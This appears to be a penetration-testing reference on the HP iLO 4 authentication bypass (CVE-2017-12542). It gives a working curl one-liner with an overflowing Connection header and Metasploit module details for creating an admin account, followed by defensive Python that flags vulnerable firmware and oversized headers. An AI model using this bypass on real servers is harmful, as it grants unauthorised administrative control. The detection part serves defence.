HP iLO 4 Authentication Bypass
HP iLO 4 (firmware < 2.53) authentication bypass caused by a buffer overflow in the web server's handling of the Connection HTTP header (CVE-2017-12542).
Adding the following header to any HTTP request should bypass authentication:
curl -k -i -H "Connection: $(python -c 'print("A"*29)')" https://<IP ADDRESS>/rest/v1/AccountService/Accounts
Reportedly, the same vulnerability can also be leveraged for remote code execution, as described in the Airbus Security Lab iLO 4 toolbox repository: https://github.com/airbus-seclab/ilo4_toolbox.
The following Metasploit module uses this vulnerability to create a new administrator account for the web interface.
msf > info auxiliary/admin/hp/hp_ilo_create_admin_account

       Name: HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation
     Module: auxiliary/admin/hp/hp_ilo_create_admin_account
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-08-24

Provided by:
  Fabien Perigaud <fabien.perigaud@synacktiv[dot]com>

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD  ZVDlDjNTfFnY     yes       Password for the new account
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                      yes       The target address
  RPORT     443              yes       The target port (TCP)
  SSL       true             no        Negotiate SSL/TLS for outgoing connections
  USERNAME  lCxA6rlF         yes       Username for the new account
  VHOST                      no        HTTP server virtual host

Description:
  This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50,
  triggered by a buffer overflow in the Connection HTTP header handling by
  the web server. Exploiting this vulnerability gives full access to the
  REST API, allowing arbitrary accounts creation.

References:
  https://cvedetails.com/cve/CVE-2017-12542/
  http://www.securityfocus.com/bid/100467
  https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
  https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html
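As an added example (not code from this page, the Airbus toolbox or the Metasploit module), the Python below turns the two facts above into defensive checks: the affected firmware range (anything below 2.53, covering the 1.00-2.50 range the module targets) and the 29-byte Connection header that triggers the overflow. The `iLO 4 vX.YY` version-string format and the sample HTTP requests are constructed assumptions; a real deployment would feed in the firmware string from the iLO REST API and the raw requests from a reverse proxy or packet capture in front of the management interface.

```python
import re
from typing import List, Optional, Tuple

# Firmware versions below this one are affected; 2.53 is the first fixed
# release according to the page.
FIXED_VERSION = (2, 53)

# The page shows that a 29-byte Connection header value is enough to trigger
# the overflow. Legitimate values ("close", "keep-alive", "Upgrade", or a
# short comma-separated list of those) are well below this length.
CONNECTION_HEADER_LIMIT = 29


def parse_ilo_version(version_string: str) -> Optional[Tuple[int, int]]:
    """Extract (major, minor) from a string such as 'iLO 4 v2.50' or '2.50'.

    The 'iLO 4 vX.YY' form is an assumption about how the firmware reports
    itself; only the first 'digits.digits' group is used.
    """
    m = re.search(r"(\d+)\.(\d+)", version_string)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def is_vulnerable_version(version_string: str) -> bool:
    """True when the reported firmware is older than the fixed release."""
    version = parse_ilo_version(version_string)
    return version is not None and version < FIXED_VERSION


def suspicious_connection_header(raw_request: str) -> Optional[str]:
    """Return the Connection header value if it is long enough to trigger
    the overflow, otherwise None. Header names are matched case-insensitively
    and both CRLF and LF line endings are accepted."""
    head = re.split(r"\r?\n\r?\n", raw_request, maxsplit=1)[0]
    for line in head.splitlines()[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "connection":
            value = value.strip()
            if len(value) >= CONNECTION_HEADER_LIMIT:
                return value
    return None


def scan_requests(requests: List[str]) -> List[int]:
    """Indices of requests whose Connection header looks like an exploit
    attempt against the iLO web server."""
    return [i for i, req in enumerate(requests)
            if suspicious_connection_header(req) is not None]


# Constructed sample traffic: one normal authenticated request, one request
# carrying the oversized Connection header from the page, one normal POST.
SAMPLE_REQUESTS = [
    "GET /rest/v1/Systems/1 HTTP/1.1\r\n"
    "Host: ilo.example.internal\r\n"
    "Connection: keep-alive\r\n"
    "Authorization: Basic dXNlcjpwYXNz\r\n\r\n",

    "GET /rest/v1/AccountService/Accounts HTTP/1.1\r\n"
    "Host: ilo.example.internal\r\n"
    "Connection: " + "A" * 29 + "\r\n"
    "Accept: */*\r\n\r\n",

    "POST /rest/v1/AccountService/Accounts HTTP/1.1\r\n"
    "Host: ilo.example.internal\r\n"
    "Connection: close\r\n"
    "Content-Length: 0\r\n\r\n",
]


if __name__ == "__main__":
    for fw in ("iLO 4 v1.00", "iLO 4 v2.50", "iLO 4 v2.53", "iLO 4 v2.55"):
        state = "VULNERABLE" if is_vulnerable_version(fw) else "patched"
        print(f"{fw}: {state}")
    for idx in scan_requests(SAMPLE_REQUESTS):
        value = suspicious_connection_header(SAMPLE_REQUESTS[idx])
        print(f"request {idx}: oversized Connection header ({len(value)} bytes)")
```

The version check is the inventory side (which iLOs still need the firmware update); the header check is the detection side, and is cheap enough to run as a rule on whatever proxy, IDS or log pipeline sits in front of the management network. Any hit on the header check against an unpatched iLO should be treated as a successful bypass and followed by a review of the REST API accounts, since that is exactly what the module above creates.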